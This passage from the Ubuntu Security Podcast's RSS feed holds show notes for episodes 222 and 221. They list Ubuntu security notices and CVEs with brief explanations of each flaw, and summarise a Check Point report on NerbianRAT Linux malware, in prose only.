<li><a href="https://ubuntu.com/security/CVE-2023-46862">CVE-2023-46862</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-46343">CVE-2023-46343</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4134">CVE-2023-4134</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-22995">CVE-2023-22995</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6680-2-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6680-2">USN-6680-2</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>7 CVEs addressed in Jammy (22.04 LTS), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-25744">CVE-2024-25744</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-0607">CVE-2024-0607</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6560">CVE-2023-6560</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6121">CVE-2023-6121</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-51782">CVE-2023-51782</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-51779">CVE-2023-51779</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-46343">CVE-2023-46343</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6681-2-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6681-2">USN-6681-2</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>8 CVEs addressed in Bionic ESM (18.04 ESM), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-0340">CVE-2024-0340</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6121">CVE-2023-6121</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-51782">CVE-2023-51782</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-51780">CVE-2023-51780</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-51779">CVE-2023-51779</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4244">CVE-2023-4244</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-22995">CVE-2023-22995</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-44879">CVE-2021-44879</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6688-1-linux-kernel--oem--vulnerabilities--03-32">[<a href="https://ubuntu.com/security/notices/USN-6688-1">USN-6688-1</a>] Linux kernel (OEM) vulnerabilities (03:32)</h3>
<ul>
<li>63 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-26600">CVE-2024-26600</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52467">CVE-2023-52467</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52588">CVE-2023-52588</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52594">CVE-2023-52594</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52470">CVE-2023-52470</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26598">CVE-2024-26598</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52589">CVE-2023-52589</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52583">CVE-2023-52583</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52444">CVE-2023-52444</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52449">CVE-2023-52449</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26591">CVE-2024-26591</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52598">CVE-2023-52598</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52448">CVE-2023-52448</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26597">CVE-2024-26597</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52605">CVE-2023-52605</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52451">CVE-2023-52451</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52454">CVE-2023-52454</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52445">CVE-2023-52445</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52587">CVE-2023-52587</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52447">CVE-2023-52447</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52436">CVE-2023-52436</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52593">CVE-2023-52593</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52601">CVE-2023-52601</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26594">CVE-2024-26594</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26592">CVE-2024-26592</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26589">CVE-2024-26589</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52462">CVE-2023-52462</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52469">CVE-2023-52469</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52438">CVE-2023-52438</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52457">CVE-2023-52457</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52458">CVE-2023-52458</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52595">CVE-2023-52595</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52597">CVE-2023-52597</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52464">CVE-2023-52464</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52463">CVE-2023-52463</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52606">CVE-2023-52606</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26625">CVE-2024-26625</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52584">CVE-2023-52584</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26624">CVE-2024-26624</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52600">CVE-2023-52600</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26581">CVE-2024-26581</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26588">CVE-2024-26588</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52603">CVE-2023-52603</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52599">CVE-2023-52599</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52443">CVE-2023-52443</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52602">CVE-2023-52602</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52456">CVE-2023-52456</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52607">CVE-2023-52607</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26628">CVE-2024-26628</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26601">CVE-2024-26601</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26627">CVE-2024-26627</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52439">CVE-2023-52439</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52604">CVE-2023-52604</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26599">CVE-2024-26599</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-24860">CVE-2024-24860</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-23849">CVE-2024-23849</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-1086">CVE-2024-1086</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-1085">CVE-2024-1085</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-0340">CVE-2024-0340</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6610">CVE-2023-6610</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-5633">CVE-2023-5633</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-50431">CVE-2023-50431</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-46838">CVE-2023-46838</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6682-1-puma-vulnerabilities--05-00">[<a href="https://ubuntu.com/security/notices/USN-6682-1">USN-6682-1</a>] Puma vulnerabilities (05:00)</h3>
<ul>
<li>6 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-21647">CVE-2024-21647</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-40175">CVE-2023-40175</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-24790">CVE-2022-24790</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-23634">CVE-2022-23634</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11077">CVE-2020-11077</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11076">CVE-2020-11076</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>HTTP server for Ruby/Rack applications that uses threading for improved performance</li>
<li><a href="/episode-217/#usn-6597-1-puma-vulnerability--04-24">[USN-6597-1] Puma vulnerability from Episode 217</a> - HTTP request smuggling
attack - fixed for mantic and lunar - now for older releases, plus a bunch of
other older HTTP request smuggling issues as well</li>
</ul>
<h3 id="usn-6683-1-htmlcleaner-vulnerability--05-45">[<a href="https://ubuntu.com/security/notices/USN-6683-1">USN-6683-1</a>] HtmlCleaner vulnerability (05:45)</h3>
<ul>
<li>1 CVEs addressed in Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-34624">CVE-2023-34624</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Java library for parsing HTML</li>
<li>DoS through crafted objects with cyclic dependencies</li>
</ul>
<h3 id="usn-6684-1-ncurses-vulnerability--06-01">[<a href="https://ubuntu.com/security/notices/USN-6684-1">USN-6684-1</a>] ncurses vulnerability (06:01)</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-50495">CVE-2023-50495</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Possible issue when parsing terminfo files - these are generally trusted, and
since the previous update for CVE-2023-29491 in
<a href="/episode-196/#usn-6099-1-ncurses-vulnerabilities--07-27">[USN-6099-1] ncurses vulnerabilities from
Episode 196</a> untrusted terminfo files are not parsed when the application is
setuid root. So has no real security impact.</li>
</ul>
<h3 id="usn-6685-1-mqtt-client-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-6685-1">USN-6685-1</a>] mqtt-client vulnerability ()</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-0222">CVE-2019-0222</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Java MQTT Client library</li>
<li>Unmarshalling a crafted MQTT frame could lead to a OOM exception -&gt; DoS</li>
</ul>
<h3 id="usn-6687-1-accountsservice-vulnerability--07-25">[<a href="https://ubuntu.com/security/notices/USN-6687-1">USN-6687-1</a>] AccountsService vulnerability (07:25)</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2012-6655">CVE-2012-6655</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Oldest CVE this week?</li>
<li>Only fixed 1 year ago by upstream</li>
<li>To change the user&rsquo;s password, Would invoke usermod with -p option and the new
encrypted/salted password - as such any user on the system would be able to
see that via inspection of <code>/proc/&lt;pid&gt;/cmdline</code> - very low risk since the
process only exists for a very small time AND it is encrypted already - so
instead now invokes <code>chpasswd</code> and specifies the new <em>encrypted</em> password over
standard input - would then need to be able to ptrace to see it which with
<a href="https://www.kernel.org/doc/Documentation/security/Yama.txt">YAMA</a> <code>ptrace_scope</code> enabled in Ubuntu means you need to be root (or a parent
process of accountsservice, which is started by dbus for the current user) -
so then an attacker would have to be able to cause the existing accountservice
to stop and then start their own to see the new encrypted password</li>
</ul>
<h3 id="usn-6658-2-libxml2-vulnerability--09-41">[<a href="https://ubuntu.com/security/notices/USN-6658-2">USN-6658-2</a>] libxml2 vulnerability (09:41)</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-25062">CVE-2024-25062</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="/episode-220/#usn-6658-1-libxml2-vulnerability--07-33">[USN-6658-1] libxml2 vulnerability from Episode 220</a></li>
<li>UAF if using DTD validation with XInclude expansion enabled</li>
</ul>
<h3 id="usn-6690-1-open-vswitch-vulnerabilities--10-01">[<a href="https://ubuntu.com/security/notices/USN-6690-1">USN-6690-1</a>] Open vSwitch vulnerabilities (10:01)</h3>
<ul>
<li>2 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-5366">CVE-2023-5366</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3966">CVE-2023-3966</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="/episode-214/#usn-6514-1-open-vswitch-vulnerability--18-18">[USN-6514-1] Open vSwitch vulnerability from Episode 214</a></li>
<li>Original fix was incomplete - required additional fixes</li>
<li>OOB read in hardware offload of Geneve packets (protocol for generic network
virtualisation encapsulation) - can mitigate by disabling this option in
config</li>
</ul>
<h3 id="usn-6689-1-rack-vulnerabilities--10-41">[<a href="https://ubuntu.com/security/notices/USN-6689-1">USN-6689-1</a>] Rack vulnerabilities (10:41)</h3>
<ul>
<li>3 CVEs addressed in Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-26146">CVE-2024-26146</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26141">CVE-2024-26141</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-27539">CVE-2023-27539</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Modular Ruby web server</li>
<li>Possible reflected DoS - crafted Range header can result in unexpectedly large
responses - can request ranges for a file which ends up being larger than the
file itself - so now just return nothing</li>
<li>ReDoS in header parsing - used a regex to split options and strip - now just splits on a
comma directly then strip each separately</li>
</ul>
<h3 id="usn-6656-2-postgresql-vulnerability--11-51">[<a href="https://ubuntu.com/security/notices/USN-6656-2">USN-6656-2</a>] PostgreSQL vulnerability (11:51)</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-0985">CVE-2024-0985</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="/episode-220/#usn-6656-1-postgresql-vulnerability--06-31">[USN-6656-1] PostgreSQL vulnerability from Episode 220</a></li>
</ul>
<h3 id="usn-6691-1-ovn-vulnerability--12-00">[<a href="https://ubuntu.com/security/notices/USN-6691-1">USN-6691-1</a>] OVN vulnerability (12:00)</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-2182">CVE-2024-2182</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Enabled bidirectional forwarding detection on logical ports - this is used to
monitor the health of remote nodes and the tunnels between them - BFD packets
are then transmitted in-band in these tunnels along with other traffic - OVN
would then process any BFD packet received on a tunnel where it was enabled -
as such a remote attacker within a container/VM connected to a OVN logical
switch port of such a tunnel could craft BFD packets which would then get
tunnelled to and processed by another node and then change the BFD state of
the tunnel and hence affect future forwarding decisions - ie. could
essentially cause a DoS to future traffic along the tunnel</li>
</ul>
<h3 id="usn-6692-1-gson-vulnerability--13-04">[<a href="https://ubuntu.com/security/notices/USN-6692-1">USN-6692-1</a>] Gson vulnerability (13:04)</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-25647">CVE-2022-25647</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Java library for JSON serialisation/deserialisation to/from Java objects</li>
<li>Only affected Java Serialisation - and then only if you were not careful when
deserialising to not include circular references between objects</li>
</ul>
<h3 id="usn-6693-1-dot-net-vulnerability--13-27">[<a href="https://ubuntu.com/security/notices/USN-6693-1">USN-6693-1</a>] .NET vulnerability (13:27)</h3>
<ul>
<li>1 CVEs addressed in Jammy (22.04 LTS), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-21392">CVE-2024-21392</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Patch Tuesday for dotnet7/8 - no real details from MS</li>
</ul>
<h3 id="usn-6663-2-openssl-update--13-55">[<a href="https://ubuntu.com/security/notices/USN-6663-2">USN-6663-2</a>] OpenSSL update (13:55)</h3>
<ul>
<li>Affecting Xenial ESM (16.04 ESM)</li>
<li><a href="/episode-220/#usn-6663-1-openssl-update--08-40">[USN-6663-1] OpenSSL update from Episode 220</a></li>
<li>Hardening update to return output instead of an exception when wrong padding
was used - removes a timing side-channel for inferring secret key</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="ubuntu-23-dot-10-to-be-a-target-in-pwn2own-vancouver-2024--14-26">Ubuntu 23.10 to be a target in Pwn2Own Vancouver 2024 (14:26)</h3>
<ul>
<li>Part of CanSecWest in Vancouver March 20-22 2024</li>
<li>Ubuntu Desktop 23.10 target in Local Escalation of Privilege Category - must
leverage a kernel vuln to escalate privs</li>
<li>Unfortunately the userns restrictions are not enabled by default in 23.10
(Mantic) so will be interesting to see what kinds of vulns get turned up</li>
<li>Will report back on findings in later episodes</li>
</ul>
<h3 id="check-point-research-report-on-magnet-goblin-s-linux-malware-variants--15-42">Check Point Research report on Magnet Goblin&rsquo;s Linux Malware Variants (15:42)</h3>
<ul>
<li><a href="https://research.checkpoint.com/2024/magnet-goblin-targets-publicly-facing-servers-using-1-day-vulnerabilities/">https://research.checkpoint.com/2024/magnet-goblin-targets-publicly-facing-servers-using-1-day-vulnerabilities/</a></li>
<li>Check Point Research reported on recent attacks targeting Ivanti Connect
Secure VPN by a threat actor they call Magnet Goblin
<ul>
<li>Ivanti Connect Secure VPN CVEs were made public in January and have been <a href="https://www.mandiant.com/resources/blog/investigating-ivanti-zero-day-exploitation">exploited in the wild</a></li>
<li>CPR decided to investigate a cluster of attacks</li>
<li>In doing so cover the details of MGs Nerbian family of malware</li>
<li><a href="https://eclypsium.com/blog/flatlined-analyzing-pulse-secure-firmware-and-bypassing-integrity-checking/">Report from Eclypsium</a> suggests running an old version of Linux
<ul>
<li>CentOS 6.4; which was released in 2013 and officially end of life in 2020
<ul>
<li>Linux kernel 2.6.32 (EOL Feb 2016)</li>
<li>openssl 1.0.2n (EOL Dec 2017)</li>
<li>Perl 5.6.1 (EOL April 2001)</li>
</ul>
</li>
<li>Clear then that the malware not only exploits Ivanti Connect but also Linux in general</li>
</ul>
</li>
<li>CPR report includes details on what TTPs to look for - IP addresses / domains etc</li>
<li>Then details the NerbianRAT malware
<ul>
<li>First disclosed in 2022 by ProofPoint when detailing the Windows variant</li>
<li>Earliest sample of this Linux variant is in an upload to VT from May 2022</li>
<li>But unlike the Windows variant, the Linux one does not include any
hardening measures - even has DWARF debugging info present so can easily
decompile</li>
<li>Only anti-debug/analysis trick is to check there are no other variants of
itself running by trying to allocate a static shared memory segment - if
this succeeds then assumes it is not running and proceeds to:
<ul>
<li>collect basic info like current time, $USER, machine name etc</li>
<li>loads a public RSA key which is later used to encrypt network comms back to a hardcoded IP address used for C2</li>
<li>then loads config which allows to configure things like when to start /
end, other C2 hosts to use, time to sleep during file transfers and more</li>
<li>for C2 uses raw TCP sockets and encrypts using the RSA key</li>
<li>waits for magic string which contains the command to run from C2</li>
</ul>
</li>
</ul>
</li>
<li>Also detail the MiniNerbian which is a simplified form for just command
execution but which used HTTP and sends POST requests to a <code>/dashboard/</code>
endpoint - likely to try and hide its network traffic in plain-sight (rather
than the raw TCP sockets with custom encrypted protocol employed by
NerbianRAT)</li>
</ul>
</li>
<li>For initial access, details are less clear but appears to exploit vulns in
Ivanti, Magento, Qlink Sense and possibly Apache ActiveMQ - dubbed 1-day
exploits</li>
<li>What do we learn?
<ul>
<li>Device makers who use OSS need to keep it up-to-date (or build on top of
systems like Ubuntu Core which come with OTA etc OOTB)</li>
<li>End-users of devices need to keep them up-to-date and deploy usual
defence-in-depth practices (but this is hard when the device is intended to
be deployed on the edge of a network - hard to add additional DiD to a VPN
concentrator)</li>
</ul>
</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://fosstodon.org/@ubuntusecurity">@ubuntusecurity@fosstodon.org</a>, <a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E222.mp3" length="25349545" type="audio/mpeg" /><itunes:duration>1446</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 221
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-221/</link>
          <pubDate>Sat, 09 Mar 2024 09:23:00 +1030 </pubDate>
          <dc:creator></dc:creator>
          <guid>d0313887e011deeeb9b1c69573b4c97c96b416d56fada7785a53df16330055081e579712d80b8aca11fe38fb40f917943d49582eb31a55344081db6eff6627c3</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 221</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          Andrei is back to discuss recent academic research into malware within the
  Python/PyPI ecosystem and whether it is possible to effectively combat it with
  open source tooling, plus we cover security updates for Unbound, libuv, node.js,...
        
        ]]></itunes:subtitle>
        <itunes:summary>  Andrei is back to discuss recent academic research into malware within the
  Python/PyPI ecosystem and whether it is possible to effectively combat it with
  open source tooling, plus we cover security updates for Unbound, libuv, node.js,
  the Linux kernel, libgit2 and more.
  </itunes:summary>
        <description>  Andrei is back to discuss recent academic research into malware within the
  Python/PyPI ecosystem and whether it is possible to effectively combat it with
  open source tooling, plus we cover security updates for Unbound, libuv, node.js,
  the Linux kernel, libgit2 and more.
  </description>
        <googleplay:description>  Andrei is back to discuss recent academic research into malware within the
  Python/PyPI ecosystem and whether it is possible to effectively combat it with
  open source tooling, plus we cover security updates for Unbound, libuv, node.js,
  the Linux kernel, libgit2 and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>Andrei is back to discuss recent academic research into malware within the
Python/PyPI ecosystem and whether it is possible to effectively combat it with
open source tooling, plus we cover security updates for Unbound, libuv, node.js,
the Linux kernel, libgit2 and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>56 unique CVEs addressed</p>
<h3 id="usn-6665-1-unbound-vulnerabilities--00-50">[<a href="https://ubuntu.com/security/notices/USN-6665-1">USN-6665-1</a>] Unbound vulnerabilities (00:50)</h3>
<ul>
<li>2 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-50868">CVE-2023-50868</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-50387">CVE-2023-50387</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Another update for recent vulns discovered in DNSSEC standard - <a href="/episode-219/#usn-6633-1-bind-vulnerabilities--07-33">[USN-6633-1]
Bind vulnerabilities from Episode 219</a> and <a href="/episode-220/#usn-6657-1-dnsmasq-vulnerabilities--07-10">[USN-6657-1] Dnsmasq
vulnerabilities from Episode 220</a></li>
</ul>
<h3 id="usn-6666-1-libuv-vulnerability--01-16">[<a href="https://ubuntu.com/security/notices/USN-6666-1">USN-6666-1</a>] libuv vulnerability (01:16)</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-24806">CVE-2024-24806</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Async event handling library - used by nodejs and others - supports async
handling TCP/UDP sockets, DNS resolution, file system operations etc</li>
<li>Would truncate hostnames to 256 characters before calling <code>getaddrinfo()</code> - but
would then fail to NUL-terminate the string - as such, <code>getaddrinfo()</code> would
read past the end of the buffer and the address that got resolved may not be
the intended one - so then a remote attacker who could influence this could
end up causing the application to contact a different address than expected
and so perhaps access internal services etc</li>
</ul>
<h3 id="usn-6667-1-cpanel-json-xs-vulnerability--02-21">[<a href="https://ubuntu.com/security/notices/USN-6667-1">USN-6667-1</a>] Cpanel-JSON-XS vulnerability (02:21)</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-48623">CVE-2022-48623</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Perl module for JSON serialisation</li>
<li>OOB read on crafted JSON - when parsing in relaxed mode, if JSON was malformed
and missing a colon would read beyond the end of the data and so potentially
could result in an info-leak or a crash</li>
</ul>
<h3 id="usn-6668-1-python-openstackclient-vulnerability--02-55">[<a href="https://ubuntu.com/security/notices/USN-6668-1">USN-6668-1</a>] python-openstackclient vulnerability (02:55)</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-6110">CVE-2023-6110</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>When deleting an access rule, would search for it by name - if it didn&rsquo;t exist
may end up returning a different rule which would then get deleted instead -
changes the semantics to only allow rules to be deleted via their ID which is
unique</li>
</ul>
<h3 id="usn-6648-2-linux-kernel--azure--vulnerabilities--03-23">[<a href="https://ubuntu.com/security/notices/USN-6648-2">USN-6648-2</a>] Linux kernel (Azure) vulnerabilities (03:23)</h3>
<ul>
<li>4 CVEs addressed in Bionic ESM (18.04 ESM), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-0646">CVE-2024-0646</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-0565">CVE-2024-0565</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6915">CVE-2023-6915</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-51781">CVE-2023-51781</a> <!-- raw HTML omitted --></li>
</ul>
</li>
